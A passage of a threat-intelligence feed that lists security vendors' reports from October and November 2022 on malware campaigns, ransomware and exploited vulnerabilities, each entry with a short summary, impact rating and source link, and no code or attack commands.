- Researchers from QuickHeal have observed a new technique that QBot leverages for its attack. It is called an “HTML Smuggling attack.”
Source:
https://blogs.quickheal.com/qbot-a-html-smuggling-technique-to-target-victims/
—
- Intel Source:
- Akamai
- Intel Name:
- New_KmsdBot_Malware_Hijacking_Systems
- Date of Scan:
- 2022-11-14
- Impact:
- LOW
- Summary:
- Researchers from Akamai have identified a newly discovered evasive malware that leverages the Secure Shell (SSH) cryptographic protocol to gain entry into targeted systems with the goal of mining cryptocurrency and carrying out distributed denial-of-service (DDoS) attacks.
Source:
https://www.akamai.com/blog/security-research/kmdsbot-the-attack-and-mine-malware
—
- Intel Source:
- DCSO CyTec Blog
- Intel Name:
- StrelaStealer_and_IceXLoader_Drive_InfoStealing_Campaigns
- Date of Scan:
- 2022-11-14
- Impact:
- LOW
- Summary:
- Researchers from DCSO CyTec have discovered new waves of malware campaigns, with two information-stealing malware making rounds in the wild. Named StrelaStealer and IceXLoader, both malware leverage malicious email attachments to lure their targets.
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0118_Group_Using_Somnia_Malware
- Date of Scan:
- 2022-11-11
- Impact:
- MEDIUM
- Summary:
- Researchers from CERT-UA have investigated threat group FRwL (aka Z-Team) and found that the initial compromise occurred as a result of downloading and running a file that mimicked the “Advanced IP Scanner” software, but actually contained the Vidar malware.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_Bypassing_MOTW
- Date of Scan:
- 2022-11-11
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that the script format found from September 8th to September 29th, 2022, bypassed Mark of the Web (MOTW), a feature offered by Microsoft that identifies the source of files.
—
- Intel Source:
- Cyble
- Intel Name:
- The_return_of_Emotet_targeting_users_worldwide
- Date of Scan:
- 2022-11-10
- Impact:
- HIGH
- Summary:
- Cyble Research and Intelligence Labs (CRIL) observed the recent Emotet spam campaign spreading malicious xls, xlsm, and password-protected zip files as an attachment to infect users. These office documents contain malicious macro code which downloads the actual Emotet binary from the remote server. Cyble intelligence shows that the recent Emotet campaign is widespread worldwide, targeting 40 countries. And this latest strain is spreading Bumblebee and IcedID malware.
Source:
https://blog.cyble.com/2022/11/09/emotet-returns-targeting-users-worldwide/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Another_malicious_VisualBasic_script
- Date of Scan:
- 2022-11-10
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified a malicious VVisualBasic script that attracted their attention. It’s no flagged as malicious but, even more, it’s reported as a simple mallicious script.
Source:
https://isc.sans.edu/diary/Another%20Script-Based%20Ransomware/29234
—
- Intel Source:
- Zimperium
- Intel Name:
- The_deep_details_of_Cloud9_Chrome_Botnet
- Date of Scan:
- 2022-11-10
- Impact:
- LOW
- Summary:
- The Zimperium Labs reserachers recently discovered a malicious browser extension that steals the information available during the browser session and also installs malware on a user’s device and subsequently assume control of the entire device. The team provided the deeper analyses into the architecture and modus operandi of this malicious browser extension, originally called Cloud9, by the malware author.
Source:
https://www.zimperium.com/blog/the-case-of-cloud9-chrome-botnet/
—
- Intel Source:
- Sophos
- Intel Name:
- The_repeated_use_of_DLL-hijack_execution
- Date of Scan:
- 2022-11-09
- Impact:
- LOW
- Summary:
- The Sophos researchers have observed multiple attacks targeting government organizations in Asia, involving DLL sideloading – on of the most comon technique of China-based APT groups and shared the evidence og the connection of the inidents and how threat actors base their attacks on well-known, effective techniques, adding complexity and variation over time.
Source:
https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/
—
- Intel Source:
- ASEC
- Intel Name:
- The_distribution_of_LockBit_3.0_Being_Distributed_by_Amadey_Bot
- Date of Scan:
- 2022-11-09
- Impact:
- MEDIUM
- Summary:
- The ASEC analysis team has observed and confirmed that attackers are using Amadey Bot to install LockBit. Amadey Bot, a malware that was first discovered in 2018, is capable of stealing information and installing additional malware by receiving commands from the attacker.
—
- Intel Source:
- Cyble
- Intel Name:
- Modified_Chaos_Ransomware_Killnet_in_the_wild
- Date of Scan:
- 2022-11-09
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyble discovered Data-destructive ransomware related to the pro-Russian Threat Actors (TA) organization “Killnet” The ransomware drops a note directed to a Telegram page for supporting Russian hacktivists. The ransomware is seen targeting multiple adversaries across the globe.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Diving_Deep_into_DeimosC2_C&C_Framework
- Date of Scan:
- 2022-11-09
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have analyzed the technical details of DeimosC2 C&C framework.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_analyses_of_malicious_use_of_multiple_intermittent_.NET_binaries
- Date of Scan:
- 2022-11-09
- Impact:
- LOW
- Summary:
- FortiGuard Labs recently analyzed a fake phishing email that drops the Warzone RAT and showed that it does using multiple intermittent .NET binaries that are increasingly obfuscated.
—
- Intel Source:
- Minerva-labs
- Intel Name:
- A_new_updated_IceXLoader_malware
- Date of Scan:
- 2022-11-09
- Impact:
- MEDIUM
- Summary:
- IceXLoader was discovered earlier this year.It is a commercial malware used to download and deploy additional malware on infected machines. While the version discovered in June (v3.0) Minerva-lab researchers recently observed a newer v3.3.3 loader which looks to be fully functionable and includes a multi-stage delivery chain.
Source:
https://minerva-labs.com/blog/new-updated-icexloader-claims-thousands-of-victims-around-the-world/
—
- Intel Source:
- Any.Run
- Intel Name:
- Raccoon_stealer_2.0_malware_analysis
- Date of Scan:
- 2022-11-09
- Impact:
- LOW
- Summary:
- The Any.Run analysts triaged multiple Raccoon stealer V2 samples, collected typical behavior activities, and briefly described its execution process. They also provided more deeper and more detailed Raccoon stealer 2.0 malware analysis to follow all steps and get a complete picture of the info stealer’s behavior.
Source:
https://thehackernews.com/2022/11/inside-raccoon-stealer-v2.html
https://any.run/malware-trends/raccoon?utm_source=hacker_news&utm_medium=article&utm_campaign=raccoon&utm_content=mtt
—
- Intel Source:
- Any.Run
- Intel Name:
- FormBook_stealer
- Date of Scan:
- 2022-11-09
- Impact:
- LOW
- Summary:
- The Any.Run analysts recorded a of malware analysis service allows us to take an in-depth look at the behavior of this clever virus and other malware such as Dridex and Lokibot with their elaborate anti-evasion techniques.
—
- Intel Source:
- Sucuri
- Intel Name:
- The_analyses_of_Black_Hat_redirect_campaign
- Date of Scan:
- 2022-11-09
- Impact:
- LOW
- Summary:
- Sucuri research team has tracked a surge in WordPress malware redirecting website visitors to fake sites attackers.They showed their analyses what this infection does, how the malicious redirects work.
Source:
https://blog.sucuri.net/2022/11/massive-ois-is-black-hat-redirect-malware-campaign.html
—
- Intel Source:
- SentinelOne
- Intel Name:
- The_expansion_of_SocGholish_malware
- Date of Scan:
- 2022-11-08
- Impact:
- LOW
- Summary:
- Researchers from SentinelOne discovered the expanding their infrastructure for staging malware with new servers. This helps the operators to counter defensive operations against known servers and scale up their operation.
—
- Intel Source:
- AbnormalSecurity
- Intel Name:
- Crimson_Kingsnake_threat_impersonation
- Date of Scan:
- 2022-11-08
- Impact:
- LOW
- Summary:
- The researchers discovered a new BEC group that impersonating tactics to swindle companies around the world. The group is called Crimson Kingsnake, impersonates real attorneys, law firms, and debt recovery services to deceive accounting professionals into quickly paying bogus invoices. Also they observed Crimson Kingsnake target companies throughout the United States, Europe, the Middle East, and Australia.
Source:
https://abnormalsecurity.com/blog/crimson-kingsnake-bec-group-attacks
—
- Intel Source:
- IronNet
- Intel Name:
- Robin_Banks_Phishing_Service_Back_to_Steal_Banking_Accounts
- Date of Scan:
- 2022-11-07
- Impact:
- LOW
- Summary:
- Researchers from IronNet have identified that the Robin Banks phishing-as-a-service (PhaaS) platform is back in action with infrastructure hosted by a Russian internet company that offers protection against distributed denial-of-service (DDoS) attacks.
Source:
https://www.ironnet.com/blog/robin-banks-still-might-be-robbing-your-bank-part-2
—
- Intel Source:
- ISC.SANS
- Intel Name:
- WindowMalware_with_VHD_Extension
- Date of Scan:
- 2022-11-07
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a phishing email including an attachment and found the email as a PDF but is in fact a VHD file.
Source:
https://isc.sans.edu/diary/Windows+Malware+with+VHD+Extension/29222/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Windows_Malware_with_VHD_Extension
- Date of Scan:
- 2022-11-07
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a phishing email including an attachment and found the email as a PDF but is in fact a VHD file.
Source:
https://isc.sans.edu/diary/Windows+Malware+with+VHD+Extension/29222/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Remcos_Downloader_with_Unicode_Obfuscation
- Date of Scan:
- 2022-11-07
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a malicious RAR archive containing a VBS script. It was called “Unidad judicial citacion pendiente Fiscalia.rar” and protected with a simple 4-numbers password to defeat automatic scanning. The same name appears inside the VBS script.
—
- Intel Source:
- Zscaler
- Intel Name:
- APT36_Targeting_Indian_Governmental_Organizations
- Date of Scan:
- 2022-11-07
- Impact:
- MEDIUM
- Summary:
- According to Zscaler researchers, APT-36 (also known as Transparent Tribe) targets users working at Indian government organizations with updated TTPs and tools.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Laplas_Clipper_Malware_distributed_through_SmokeLoader
- Date of Scan:
- 2022-11-04
- Impact:
- LOW
- Summary:
- Researchers from Cyble Identified a new attack technique leveraging SmokeLoader to load various malware into the target system, compromised through spam emails. The campaign seems to be highly active in the wild, using Laplas Clipper targetting Cryptocurrency users.
Source:
https://blog.cyble.com/2022/11/02/new-laplas-clipper-distributed-by-smokeloader/
—
- Intel Source:
- Blackberry
- Intel Name:
- The_threat_actor_RomCom_new_attacks
- Date of Scan:
- 2022-11-04
- Impact:
- LOW
- Summary:
- The BlackBerry Threat Research and Intelligence team shed light on RomCom’s new attack campaigns spoofing legitimate network scanning tools through phishing and spoofed domains targetting Ukraine and other English-speaking countries delivering RomComs RAT.
Source:
https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass
—
- Intel Source:
- Securonix
- Intel Name:
- Apache_Commons_Text4Shell_Vulnerability
- Date of Scan:
- 2022-11-04
- Impact:
- MEDIUM
- Summary:
- Securonix researchers have analyzed the Apache Commons Text library vulnerability that is currently being exploited. On October 13, Apache Software Foundation was notified of a Text4shell vulnerability affecting versions 1.5 to 1.9. It has been patched in version 1.10.0.
Source:
https://www.securonix.com/blog/apache-commons-text4shell/
—
- Intel Source:
- VMware
- Intel Name:
- Ransomware_targeting_ESXi
- Date of Scan:
- 2022-11-04
- Impact:
- LOW
- Summary:
- Researchers from VMware’s Threat Analysis Team shed details about various ransomware families targetting Enterprises leveraging VMware ESXi, their techniques, and tactics.
—
- Intel Source:
- SentinelOne
- Intel Name:
- New_Black_Basta_Ransomware_Tools_and_tactics
- Date of Scan:
- 2022-11-04
- Impact:
- LOW
- Summary:
- Sentinel Labs researchers shed light on the highly evasive Black Basta Ransomware, which they link to FIN7 or one of their developer’s operational TTPs in depth, exposing previously undiscovered tools and tactics.
—
- Intel Source:
- ESentire
- Intel Name:
- Raise_in_Chromeloader_Malware_attacks
- Date of Scan:
- 2022-11-04
- Impact:
- LOW
- Summary:
- Researchers from ESentire discovered the latest traces of Chromeloader Malware being spread in the wild. The malware seems more persistent, promising higher permissions on the target’s system.
Source:
https://www.esentire.com/blog/chromeloader-observations-on-the-rise
—
- Intel Source:
- Group-IB
- Intel Name:
- OPERA1ER_APT_Hackers_attacks
- Date of Scan:
- 2022-11-04
- Impact:
- LOW
- Summary:
- Researchers from Group-IB have identified that a French-speaking threat actor named OPERA1ER has been linked to a series of more than 30 successful cyber attacks aimed at banks, financial services, and telecom companies across Africa, Asia, and Latin America between 2018 and 2022.
—
- Intel Source:
- PaloAlto
- Intel Name:
- A_Guloader_variant_techniques
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- Unit 42 researchers observed a new Guloader variant that contains a shellcode payload protected by anti-analysis techniques. Their purpose is to slow human analysts and sandboxes processing this sample.
Source:
https://unit42.paloaltonetworks.com/guloader-variant-anti-analysis/
—
- Intel Source:
- Symantec
- Intel Name:
- Cranefly_Hackers_Installing_Undocumented_Malware
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- A Symantec researcher have discovered that an unknown dropper is being used to install a new backdoor and other tools by reading commands from seemingly innocuous Internet Information Services (IIS) logs.
—
- Intel Source:
- ASEC
- Intel Name:
- Elbie_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- Using internal monitoring, ASEC researchers have discovered that ieinstal.exe is being used in the distribution of Elbie ransomware.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Techniques_used_by_notorious_banking_Trojans
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- Palo Alto ranalysts summarized techniques used by notorious banking Trojan families to evade detection, steal sensitive data and manipulate data. We’ll also describe how those techniques can be blocked. These families include Zeus, Kronos, Trickbot, IcedID, Emotet and Dridex.
Source:
https://unit42.paloaltonetworks.com/banking-trojan-techniques/
—
- Intel Source:
- ASEC
- Intel Name:
- Surtr_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
-
Researchers from ASEC have discovered that Surtr ransomware is being distributed. This ransomware encrypts files, then adds a “[[email protected]].[
].Surtr” file extension to the original file extension name.
—
- Intel Source:
- Wordsfence
- Intel Name:
- The_Fox_Hack_malicious_functions
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- The Wordfence threat analysts recently discovered the latest version of a Command and Control (C2) script, which is referred to as F-Automatical within the script’s code and was commonly known as FoxAuto in older versions. This version of this automatic C2 script that is developed and distributed by a threat group called Anonymous Fox. This script allows for anything from simple information stealing attacks, up to full site takeover, and more.
—
- Intel Source:
- SecurityAffairs
- Intel Name:
- Ignoring_of_old_Wannacry_ransomware
- Date of Scan:
- 2022-11-03
- Impact:
- MEDIUM
- Summary:
- In May 2017, the world learned about a global security attack, the Wannacry ransomware carried out through a malicious code capable of encrypting data residing in information systems and demanding a ransom in cryptocurrency to restore them, the Wannacry ransomware. That attack was considered to be the worst cyber attack in terms of contamination rate and scope, putting public offices and companies (especially healthcare facilities) out of operation. By this happening, some companies still didn’t learn the lesson and still ignoring it.
Source:
https://securityaffairs.co/wordpress/137894/cyber-crime/wannacry-hybrid-malware.html
—
- Intel Source:
- ASEC
- Intel Name:
- Appleseed_Malware_Spreading_to_Nuclear_Power_Plant_Companies
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered that AppleSeed has been distributed to nuclear power plants. Kimsuky, a North Korean affiliated organization, is actively distributing AppleSeed, a backdoor malware, to many companies.
—
- Intel Source:
- Securelist
- Intel Name:
- The_observation_of_public_cloud_services_attacks
- Date of Scan:
- 2022-11-03
- Impact:
- MEDIUM
- Summary:
- Kaspersky has reported several incidents where attackers used cloud services for C&C. They described in their report several interesting incidents for server-side attacks, C&C in public clouds and other MDR cases
Source:
https://securelist.com/server-side-attacks-cc-in-public-clouds-mdr-cases/107826/
—
- Intel Source:
- VMware
- Intel Name:
- ShadowPad_malware_analyses
- Date of Scan:
- 2022-11-02
- Impact:
- LOW
- Summary:
- VMware researchers have discovered active ShadowPad C2s on the Internet by analyzing the command and control (C2) protocol.
—
- Intel Source:
- Crowdstrike
- Intel Name:
- Vulnerable_Docker_and_Kubernetes_Infrastructure_targeted_by_a_Kiss-a-Dog_Cryptojacking_Campaign
- Date of Scan:
- 2022-11-02
- Impact:
- LOW
- Summary:
- The CrowdStrike team have identified a new cryptojacking campaign called “Kiss-a-dog” that targets vulnerable Docker and Kubernetes infrastructures. The campaign uses an obscure domain from the payload, container escape attempts, and anonymized dog mining pools to target Docker and Kubernetes infrastructures.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Transformation_of_DarkVNC_from_VNC
- Date of Scan:
- 2022-11-02
- Impact:
- LOW
- Summary:
- A team of researchers from SANS have analyzed Virtual Network Computing (VNC), which is a method for controlling a computer remotely. In addition, VNC is a cross-platform screen-sharing system that allows full keyboard and visual control of a remote computer as if you were physically present.
—
- Intel Source:
- DFIRReport
- Intel Name:
- Follina_Vulnerability_triggering_Qbot_infection_chain_compromising_Domain
- Date of Scan:
- 2022-11-02
- Impact:
- LOW
- Summary:
- The DFIR Report researchers discovered an intrusion using the Follina Vulnerability for Initial Access that caused Qbot infection, compromised the entire domain, launched several payloads, and evaded detection.
Source:
https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/
—
- Intel Source:
- Trustwave
- Intel Name:
- An_increase_in_threats_packaged_in_password_protected_archives
- Date of Scan:
- 2022-11-01
- Impact:
- LOW
- Summary:
- Trustwave lab discovered a rise of in threats packaged in password-protected archives with about 96% of these being spammed by the Emotet Botnet. The team also noticed an interesting attachment in this spam campaign. Disguised as an invoice, the attachment in either ZIP or ISO format, contained a nested self-extracting (SFX) archive.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_payload_for_NetSupport_RAT_from_the_sczriptzzbn_inject
- Date of Scan:
- 2022-11-01
- Impact:
- LOW
- Summary:
- This month reserchers from SANS had seeing a payload for NetSupport RAT from the sczriptzzbn inject. This injected script causes a fake browser update page to appear in the victim’s browser.
—
- Intel Source:
- MalwareBytes
- Intel Name:
- The_remote_desktop_services_targeted_by_Venus_ransomware
- Date of Scan:
- 2022-11-01
- Impact:
- LOW
- Summary:
- Malwarebytes researchers shared about the threat actors behind the relatively new Venus Ransomware are hacking into publicly-exposed Remote Desktop services to encrypt Windows devices.
Source:
https://www.malwarebytes.com/blog/news/2022/10/venus-ransomware-targets-remote-desktop-services
—
- Intel Source:
- Microsoft
- Intel Name:
- The_Raspberry_Robin_worm_recent_activity
- Date of Scan:
- 2022-10-31
- Impact:
- LOW
- Summary:
- The researchers from Microsoft has noted recent activity for the Raspberry Robin worm which links to other malware families and alternate infection methods beyond its original USB drive spread. These infections are taking to the follow-on hands-on-keyboard attacks and human-operated ransomware activity. Microsoft monitoring of Raspberry Robin activity also shows it is very active operation: Microsoft Defender for Endpoint data indicates that nearly 3,000 devices in almost 1,000 organizations have seen at least one Raspberry Robin payload-related alert in the last 30 days.
—
- Intel Source:
- TrendMicro
- Intel Name:
- A_rise_of_BlackCat_ransomware
- Date of Scan:
- 2022-10-31
- Impact:
- MEDIUM
- Summary:
- The BlackCat ransomware recently was very successful in the attacks on big-profile companies and it uses the triple extortion to exposing exfiltrated data. Plus ransomware actors that use triple extortion threaten to launch distributed denial-of-service (DDoS) attacks on their victims’ infrastructure to coerce them to pay the ransom.
Source:
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackcat
—
- Intel Source:
- ASEC
- Intel Name:
- AgentTesla_Being_Distributed_via_VBS
- Date of Scan:
- 2022-10-31
- Impact:
- LOW
- Summary:
- The ASEC analysis team has recently identified that AgentTesla is being distributed through malicious VBS. The script file has multiple codes that have been obfuscated multiple times. AgentTesla has been found to be distributed last May through a Windows Help file (*.chm), and it seems that its distribution method is continuously changing.
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Attack_Group_Disabling_Anti-Malware_Programs_With_the_BYOVD_Technique
- Date of Scan:
- 2022-10-31
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have identified the Malware Infection by the Lazarus Attack Group Disabling Anti-Malware Programs With the BYOVD Technique
—
- Intel Source:
- TrendMicro
- Intel Name:
- Qakbot_evolves_intrusion_by_leveraging_valid_code_signing
- Date of Scan:
- 2022-10-31
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro extensively researched Qakbot evolving into more intrusive malware leveraging valid code signing through excel macros and .dll files. Qakbot has been seen enumerating and dumping certificates and private keys since July.
—
- Intel Source:
- Securelist
- Intel Name:
- The_Growth_of_LODEINFO_backdoor_shellcode
- Date of Scan:
- 2022-10-31
- Impact:
- LOW
- Summary:
- Securelist researchers have identified that LODEINFO shellcode was regularly updated for use with each infection vector. The developer of LODEINFO v0.5.6 has implemented three new backdoor commands that enhance evasion techniques for certain security products.
Source:
https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/
—
- Intel Source:
- Medium
- Intel Name:
- The_update_of_Brute_Ratel_decryption
- Date of Scan:
- 2022-10-28
- Impact:
- LOW
- Summary:
- The developer released his notes with the addition of a change to a dynamic key instead of the hardcoded key everyone refers to. The hardcoded key is still used and exists for decrypting some of the strings on board.
Source:
https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb
—
- Intel Source:
- Fortinet
- Intel Name:
- Warzone_RAT_Delivering_via_Fake_Hungarian_Government_Email
- Date of Scan:
- 2022-10-28
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGuard have discovered an email pretending to come from the Hungarian government. It includes an attachment that is a zipped executable that, upon execution, extracts the Warzone RAT to memory and runs it.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- C2_Communications_Through_outlook
- Date of Scan:
- 2022-10-27
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified a malicious Python script that exchanges information with its C2 server through emails.
Source:
https://isc.sans.edu/diary/C2+Communications+Through+outlookcom/29180/
—
- Intel Source:
- 360Netlab
- Intel Name:
- Fodcha_Botnet_is_Back_With_New_Version
- Date of Scan:
- 2022-10-27
- Impact:
- LOW
- Summary:
- Researchers from 360Netlab have observed that Fodcha botnet updated with new version and in it the hacker redesigned the communication protocol, and started to use xxtea and chacha20 algorithms to encrypt sensitive resources and network communication to avoid detection at the file & traffic level.
Source:
https://blog.netlab.360.com/ddosmonster_the_return_of__fodcha_cn/
—
- Intel Source:
- ASEC
- Intel Name:
- FormBook_InfoStealer_Being_Distributing_as_DotNet
- Date of Scan:
- 2022-10-27
- Impact:
- LOW
- Summary:
- ASEC researchers have identified FormBook malware that is downloaded to the system and executed while the user was using a web browser. It is an info-stealer that aims to steal the user’s web browser login information, keyboard input, clipboard, and screenshots.
—
- Intel Source:
- ASEC
- Intel Name:
- Qakbot_Malware_Spreading_Rapidly_in_Korea
- Date of Scan:
- 2022-10-27
- Impact:
- LOW
- Summary:
- ASEC researchers have identified the Qakbot malware is being distributed to Korean users. It is using ISO files, which is similar to the previous version, but a process to bypass behavior detection was added.
—
- Intel Source:
- ASEC
- Intel Name:
- CoinMiner_Leveraging_Vulnerable_Apache_Tomcat_Web_Server
- Date of Scan:
- 2022-10-27
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified the attacks that are targeting vulnerable Apache Tomcat web servers.
—
- Intel Source:
- ASEC
- Intel Name:
- Deep_Analysis_of_Attack_Techniques_and_Cases_Using_RDP
- Date of Scan:
- 2022-10-26
- Impact:
- LOW
- Summary:
- Researchers from ASEC have analyzed the cases of RDP (Remote Desktop Protocol) attacks using techniques and cases. It is commonly used in most attacks, and this is because it is useful for initial compromise or lateral movement in comparison to remote control tools that require additional installation processes.
—
- Intel Source:
- ASEC
- Intel Name:
- A_distribution_of_Amadey_Bot_malware
- Date of Scan:
- 2022-10-26
- Impact:
- LOW
- Summary:
- The Korean Internet & Security Agency shared a notice “Advising Caution on Cyber Attacks Exploiting the Kakao Service Malfunction Issue’, with the malware details about it pretending it as a KakaoTalk installation file (KakaoTalkUpdate.zip etc.) and being distributed by email. The ASEC analysis team got the relevant samples and discovered that it has same filename and icon as the actual messenger program, which prompts ordinary users to launch it.
—
- Intel Source:
- TrendMicro
- Intel Name:
- LV_Ransomware_Leveraging_ProxyShell_to_Attack
- Date of Scan:
- 2022-10-26
- Impact:
- LOW
- Summary:
- Researchers from Trend Micro have identified ransomware as a service (RaaS) named LV Ransomware which is exploiting ProxyShell in an attack on a Jordan-based company.
Source:
https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
—
- Intel Source:
- Guardio
- Intel Name:
- Malicious_Extension_Dormant_Colors
- Date of Scan:
- 2022-10-26
- Impact:
- LOW
- Summary:
- Researchers from Guardio Security have identified the Dormant Colors extension malicious campaign with millions of active installations worldwide. There are at least 30 variants of this extension part of a campaign for both Chrome and Edge, available freely in the relevant stores.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Scammers_Impersonating_Multiple_Brands_for_Phishing_Attack
- Date of Scan:
- 2022-10-26
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have analyzed the phishing campaigns and found top brands which are most frequently imitated by criminals in their attempts to steal individuals’ personal information or payment credentials during July, August, and September.
—
- Intel Source:
- ASEC
- Intel Name:
- Evolution_of_Magniber_Ransomware
- Date of Scan:
- 2022-10-26
- Impact:
- LOW
- Summary:
- Researchers from ASEC have analyzed the Magniber ransomware files distributed in each time period. In the month of September alone, there have been format changes up to four times (cpl -> jse -> js -> wsf -> msi). Frequent changes were also made to the method of injection, UAC bypassing and deactivation of the Windows 10 recovery environment, for the purpose of bypassing detection.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Analysis_of_Malicious_RTF_Files
- Date of Scan:
- 2022-10-25
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed malicious RTF files.
Source:
https://isc.sans.edu/diary/rtfdumps+Find+Option/29174/
—
- Intel Source:
- CISA
- Intel Name:
- US_Government_warns_of_Daixin_Team_Targeting_Health_sector_with_Ransomware
- Date of Scan:
- 2022-10-25
- Impact:
- MEDIUM
- Summary:
- The Daixin Team is a ransomware and data extortion group that has targeted the HPH sector with ransomware and data extortion operations since at least June 2022. Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Web_Skimmers_Still_Active
- Date of Scan:
- 2022-10-25
- Impact:
- LOW
- Summary:
-
PaloAlto researchers have analyzed the latest trends of web threats such as host and landing URLs, including where they are hosted,
what categories they belong to, and which malware families pose the most threats.
Source:
https://unit42.paloaltonetworks.com/web-threat-trends-web-skimmer/
—
- Intel Source:
- Zscaler
- Intel Name:
- SideWinder_APT_Using_New_WarHawk_Backdoor
- Date of Scan:
- 2022-10-25
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have identified that SideWinder APT uses WarHawk malware to Target Entities in Pakistan.
Source:
https://www.zscaler.com/blogs/security-research/warhawk-new-backdoor-arsenal-sidewinder-apt-group-0
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cuba_Ransomware_Targeting_Ukrainian_Government_Agencies
- Date of Scan:
- 2022-10-25
- Impact:
- LOW
- Summary:
-
CERT-UA researchers have issued an alert about potential Cuba Ransomware attacks against critical networks in the country.
They observed a new wave of phishing emails that impersonated the Press Service of the General Staff of the Armed Forces of Ukraine,
urging recipients to click on an embedded link.
—
- Intel Source:
- Cyble
- Intel Name:
- Infostealer_Distributing_Via_Free_and_Cracked_Software
- Date of Scan:
- 2022-10-24
- Impact:
- LOW
- Summary:
- Researchers from Cyble have identified the new Temp stealer spreading via free and cracked software.
Source:
https://blog.cyble.com/2022/10/20/infostealer-distributed-using-bundled-installer/
—
- Intel Source:
- ASEC
- Intel Name:
- Various_Remote_Control_Tools_attacks
- Date of Scan:
- 2022-10-24
- Impact:
- LOW
- Summary:
- Researchers from ASEC discovered multiple attack campaigns abusing various remote control tools to steal information, install backdoors and deploy malwares.
—
- Intel Source:
- Wordsfence
- Intel Name:
- Zero_Day_Vulnerabilities_in_Microsoft_Exchange_Server
- Date of Scan:
- 2022-10-21
- Impact:
- MEDIUM
- Summary:
- Wordfence researchers have observed exploit attempts targeting two zero-day vulnerabilities in Microsoft Exchange Server tracked as CVE-2022-41040 and CVE-2022-41082. A total of 1,658,281 exploit attempts were observed across their network of 4 million protected websites due to these vulnerabilities.
Source:
https://www.wordfence.com/blog/2022/10/two-weeks-of-monitoring-proxynotshell-threat-activity/
—
- Intel Source:
- Wordsfence
- Intel Name:
- Hackers_Exploiting_Text4Shell_Vulnerability
- Date of Scan:
- 2022-10-21
- Impact:
- HIGH
- Summary:
- Researchers from Wordfence have started detecting exploitation attempts targeting the newly disclosed flaw in Apache Commons Text on October 18, 2022. The vulnerability, tracked as CVE-2022-42889 aka Text4Shell, has been assigned a severity ranking of 9.8 out of a possible 10.0 on the CVSS scale and affects versions 1.5 through 1.9 of the library.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_multiple_malware_attacks_on_VMware_Vulnerability
- Date of Scan:
- 2022-10-21
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet discovered multiple malware campaigns leveraging CVE-2022-22954 to deploy Mirai, RAR1ransom, GuardMiner.
Source:
https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability
—
- Intel Source:
- Checkpoint
- Intel Name:
- Black_Basta_and_the_Unnoticed_Delivery
- Date of Scan:
- 2022-10-20
- Impact:
- MEDIUM
- Summary:
- Researchers from Checkpoint have observed in a recent Black Basta incident spotted by Incident Response Team, the operators behind this ransomware also have an impressive organizational structure.
Source:
https://research.checkpoint.com/2022/black-basta-and-the-unnoticed-delivery/
—
- Intel Source:
- TrendMicro
- Intel Name:
- WatchDog_Hackers_Possibly_Impersonating_TeamTNT
- Date of Scan:
- 2022-10-20
- Impact:
- LOW
- Summary:
- Researchers at TrendMicro have found that the attack patterns are similar to the arsenal used by TeamTNT, but that it is likely a different cryptocurrency mining group, known as WatchDog, is deploying the code.
Source:
https://www.trendmicro.com/en_us/research/22/j/teamtnt-returns-or-does-it.html
—
- Intel Source:
- Mandiant
- Intel Name:
- A_New_Variant_of_URSNIF_Malware
- Date of Scan:
- 2022-10-20
- Impact:
- LOW
- Summary:
- Researchers from Mandiant have observed URSNIF malware shifting its focus to Ransomware and Data Theft from Banking fraud.
Source:
https://www.mandiant.com/resources/blog/rm3-ldr4-ursnif-banking-fraud
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- LAZARUS_attacks_using_spear_phishing_emails
- Date of Scan:
- 2022-10-19
- Impact:
